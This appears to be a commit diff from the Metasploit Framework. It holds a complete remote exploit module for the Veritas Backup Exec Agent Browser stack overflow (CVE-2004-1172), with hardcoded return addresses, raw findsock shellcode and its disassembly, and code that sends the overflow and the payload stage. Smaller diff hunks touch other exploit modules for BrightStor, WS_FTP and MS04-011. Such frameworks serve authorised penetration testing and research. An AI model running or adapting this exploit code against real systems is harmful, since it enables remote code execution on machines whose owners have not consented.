class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Veritas Backup
|
||||
Exec Agent Browser service. This vulnerability occurs when a
|
||||
recv() call has a length value too long for the destination
|
||||
stack buffer. By sending an agent name value of 63 bytes or
|
||||
more, we can overwrite the return address of the recv
|
||||
function. Since we only have ~60 bytes of contiguous space
|
||||
for shellcode, a tiny findsock payload is sent which uses a
|
||||
hardcoded IAT address for the recv() function. This payload
|
||||
will then roll the stack back to the beginning of the page,
|
||||
recv() the real shellcode into it, and jump to it. This
|
||||
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
|
||||
8.6.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '12418'],
|
||||
[ 'CVE', '2004-1172'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
[ 'MIL', '10'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'MinNops' => 512,
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
|
||||
},
|
||||
],
|
||||
[
|
||||
'Veritas BE 8.5',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(6101)
|
||||
], self)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
|
||||
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
|
||||
# nulls: [0x00401150 -> 0x401150FF]
|
||||
stage_code = "\xfc" * 112
|
||||
stage_read =
|
||||
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
|
||||
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
|
||||
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
|
||||
|
||||
# Configure the IAT for the recv call
|
||||
stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
|
||||
|
||||
# Stuff it all into one request
|
||||
stage_code[2, stage_read.length] = stage_read
|
||||
|
||||
# Create the registration request
|
||||
req =
|
||||
"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
|
||||
"1.1.1.1.1.1\x00" + "\xeb\x81"
|
||||
|
||||
print_status("Sending the agent registration request of #{req.length.to_s} bytes...")
|
||||
sock.put(req)
|
||||
|
||||
print_status("Sending the payload stage down the socket...")
|
||||
sock.put(payload.encoded)
|
||||
|
||||
print_status("Waiting for the payload to execute...")
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
__END__
|
||||
[ findsock stage ]
|
||||
00000000 31F6 xor esi,esi
|
||||
00000002 C1EC0C shr esp,0xc
|
||||
00000005 C1E40C shl esp,0xc
|
||||
00000008 89E7 mov edi,esp
|
||||
0000000A 89FB mov ebx,edi
|
||||
0000000C 6A01 push byte +0x1
|
||||
0000000E 8B7424FE mov esi,[esp-0x2]
|
||||
00000012 31D2 xor edx,edx
|
||||
00000014 52 push edx
|
||||
00000015 42 inc edx
|
||||
00000016 C1E210 shl edx,0x10
|
||||
00000019 52 push edx
|
||||
0000001A 57 push edi
|
||||
0000001B 56 push esi
|
||||
0000001C B8FF501140 mov eax,0x401150ff
|
||||
00000021 C1E808 shr eax,0x8
|
||||
00000024 FF10 call near [eax]
|
||||
00000026 85C0 test eax,eax
|
||||
00000028 7907 jns 0x31
|
||||
0000002A 89DC mov esp,ebx
|
||||
0000002C 4E dec esi
|
||||
0000002D 85F6 test esi,esi
|
||||
0000002F 75E1 jnz 0x12
|
||||
00000031 FFD7 call edi
|
|
@ -95,6 +95,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(4096)
|
||||
|
||||
# Overwriting the return address works well, but the only register
|
||||
|
|
|
@ -93,6 +93,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect_udp
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = 'X' * 4096
|
||||
|
||||
# esp @ 971
|
||||
|
|
|
@ -62,6 +62,8 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
|
|||
|
||||
def exploit
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# The 'one line' request does not work against Windows 2003
|
||||
1.to(5) { |i|
|
||||
|
||||
|
|
|
@ -72,7 +72,9 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# The server reverses four bytes starting at offset 0xa5 :0
|
||||
|
||||
# Create the overflow string
|
||||
|
|
|
@ -61,7 +61,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_alphanum(8192)
|
||||
buf = Rex::Text.rand_text_alphanumeric(8192)
|
||||
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
||||
buf[514, 4] = [ target.ret ].pack('V')
|
||||
buf[518, 4] = [ target.ret ].pack('V')
|
||||
|
|
|
@ -129,7 +129,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
|||
if (datastore['PROTO'] == 'smtp')
|
||||
greeting = sock.get_once
|
||||
|
||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanum(rand(10)+1)) + "\r\n")
|
||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||
resp = sock.get_once
|
||||
|
||||
sock.put("STARTTLS\r\n")
|
||||
|
|
Loading…
Reference in New Issue